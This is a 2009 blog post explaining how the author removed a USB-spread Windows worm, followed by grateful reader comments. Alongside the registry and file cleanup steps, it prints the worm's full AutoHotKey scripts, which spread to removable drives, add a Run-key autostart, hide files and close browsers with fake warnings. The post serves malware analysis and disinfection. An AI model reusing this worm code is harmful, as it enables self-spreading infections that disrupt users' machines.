Monday, January 26, 2009

How to remove virus winthb also win.exe and avgs.exe

winthb is a virus program recently came to my system from a usb flash device. It hides the hidden folders completely and copies the autorun.inf file to c: drive and reproduces it whenever we delete that.The icon of the c: drive changes to something like below

The virus program also has the symptoms listed below,

1. when we try to search orkut in google, it will display an error message " WARNING,orkut is sending viruses to your pc. To protect your pc close this window ,orkut is infected by jammer worm " also it will play a music . (win.mp3)
2. when we try youtube ,WARNING,Dangerous script send by youtube, Windows system files damage if this script run
3.In my system mozilla firefox was disabled when the thb fellow came ,anyway the firefox showed "File missing,TCP/IP module Missing from npqtplugin4.dll. it may infected by virus"


How to remove winthb virus
take start>run>enter temp
clear the directory
also run %temp 
clear that also
As a first step when u boot into windows press ALT+CTRL+DEL.Stop the process win.exe and avgs.exe if they are running.Goto run type regedit(enter).Then the registry editor window will come.[1]Goto HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue will be made 0 by the program make it 1.
Now all the hidden files will be available. Goto Tools>folderoptions>view>show all hidden files.
Now search for avgs.exe in the windows search engine.If there is a file available in the search loacte its path.Do not double click on any drives to get into them because most of the viruses get into system when we double click on the drive by running the autorun.inf file.If we have to , do a adreess bar opening .I got the fellows from my C:\windows\system32\win.dll\
the folder icon for win.dll was not appearing as a usual folder icon it was the icon for dll files and also it was hidden. So please do not run any virus while doing these.If u do so u wont see the hidden files. In this case u have to do the [1].FInd the folder and delete it. Find any file named win.exe ,avgs.exe,.The folder C:\windows\system32\win.dll\ contained some files named 
win.exe
avgs.exe
Desktop.ini
std.txt
Drivelist.txt
Icon.ico
reproduce.txt
win.mp3
thb.ico
Dll.ico
script1.txt


The virus script looks like the one below,
std.txt
#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
 regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
Run D:\RECYCLE\win.exe D:\RECYCLE\script1.txt
Run D:\RECYCLE\avgs.exe D:\RECYCLE\reproduce.txt


reproduce.txt
#notrayicon
#persistent
ArrayCount = 0
Loop, Read,D:\RECYCLE\driveList.txt
{
    ArrayCount += 1
    Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return

reproduce:

Loop %ArrayCount%
{

    element := Array%A_Index%
    driveget,data,Type,%element%:\
    ifequal,data,Removable
     {
     driveget,data1,status,%element%:\
      ifequal,data1,Ready
      {
        FileCopydir,D:\RECYCLE\reg.bkp,%element%:\,1

      }

     }
}
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,D:\RECYCLE\win.exe D:\RECYCLE\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,D:\RECYCLE\win.exe D:\RECYCLE\std.txt

ifnotexist,c:\thb.ico
 ifnotexist,c:\autorun.inf
         filedelete,c:\autorun.inf
         Filecopy,C:\DOCUME~1\Ravi\LOCALS~1\Temp\winthb\thb.ico,c:\
Filecopy,C:\DOCUME~1\Ravi\LOCALS~1\Temp\winthb\autorun.inf,c:\
return


script1.txt

#persistent
#notrayicon
settimer,ban,2000
return

ban:
WinGetActiveTitle, ed
 ifinstring,ed,orkut
  {
   winclose %ed%
   soundplay,D:\RECYCLE\win.mp3
   msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r                orkut is infected by jammer worm ,30
   return
  }
 ifinstring,ed,youtube
  {
   winclose %ed%
   soundplay,D:\RECYCLE\win.mp3
   msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
   return
  }
 ifinstring,ed,Mozilla Firefox
  {
    winclose %ed%
    msgbox,262160,File missing,TCP/IP module Missing from npqtplugin4.dll. it may infected by virus  `r`r       ,30
    return
  }
ifwinactive ahk_class IEFrame
{

 ControlGetText,ed,edit1,ahk_class IEFrame
 ifinstring,ed,orkut
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
    msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r                orkut is infected by jammer worm ,30
    return
  }
 ControlGetText,ed,edit2,ahk_class IEFrame
 ifinstring,ed,orkut
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
    msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r                orkut is infected by jammer worm ,30
     return
  }
 ControlGetText,ed,edit3,ahk_class IEFrame
 ifinstring,ed,orkut
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
   msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r                orkut is infected by jammer worm ,30
    return
  }
 ControlGetText,ed,edit4,ahk_class IEFrame
 ifinstring,ed,orkut
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
    msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r                orkut is infected by jammer worm ,30
    return
  }
 ControlGetText,ed,edit1,ahk_class IEFrame
 ifinstring,ed,youtube
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
    msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
    return
  }
 ControlGetText,ed,edit2,ahk_class IEFrame
 ifinstring,ed,youtube
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
    msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
     return
  }
 ControlGetText,ed,edit3,ahk_class IEFrame
 ifinstring,ed,youtube
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
   msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
    return
  }
 ControlGetText,ed,edit4,ahk_class IEFrame
 ifinstring,ed,youtube
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
    msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
    return
  }

}
return

  • Creates c:\windows\system32\win.dll\svchost.exe
  • create folder C:\WINDOWS\system32\win.dll
  • create folder C:\WINDOWS\system32\win.dll\reg.bkp
  • Copies filec:\docume~1\user\locals~1\temp\winthb\win.exe to c:\windows\system32\win.dll\win.exe
  • Copies filec:\docume~1\user\locals~1\temp\winthb\avgs.exe to c:\windows\system32\win.dll\avgs.exe
  • Copies filec:\docume~1\user\locals~1\temp\winthb\drivelist.txt to c:\windows\system32\win.dll\drivelist.txt
  • Copies filec:\docume~1\user\locals~1\temp\winthb\win.mp3 to c:\windows\system32\win.dll\win.mp3
  • Copies filec:\docume~1\user\locals~1\temp\winthb\Icon.ico to c:\windows\system32\win.dll\Icon.ico
  • Copies filec:\docume~1\user\locals~1\temp\winthb\thb.ico to c:\windows\system32\win.dll\thb.ico
  • Copies filec:\docume~1\user\locals~1\temp\winthb\DLL.ico to c:\windows\system32\win.dll\DLL.ico
  • Deletes c:\autorun.inf
  • Copies filec:\docume~1\user\locals~1\temp\winthb\thb.ico to c:\thb.ico
  • Copies filec:\docume~1\user\locals~1\temp\winthb\autorun.inf to c:\autorun.inf

After all these things i found a copy of the thb files in my D:\RECYCLE it looked like RECYCLER but there was no R at the end.Clear that aslo.Also idont know whether the script has any other effects.If any feel free to comment.Thanks

9 comments:

Dinesh said...

Thank you Mr.. Thank you very much..

It helped me..

aravi said...

thanks mannn it helped me also!!!

SHOBHIT said...

man hats off to u.a genius......this worm was pissing me since ages.... A BIG THANK U

Vivek said...

wow nice article.. btw what language are these scripts?

Prince Mathew, Thiruvalla, Kerala, India said...

Thank U man... Thank U very much. That much I suffered by this virus.

Helper said...

@Vivek

The language is clearly AutoHotKey scripting, which is an open source scripting language automation and macro creation in Windows. Very similar to AutoIt scripting language.

Regards
Helper

sk said...

thanks a ton dude...
also, you might want to delete the prefetch files of win.exe, avgs.exe etc from your prefetch folder :

c:\windows\prefetch

Raveendra Pai G said...

thanks for the information Mr sk
also thanks for the comments

Anonymous said...

Thank you so much for this valuable information.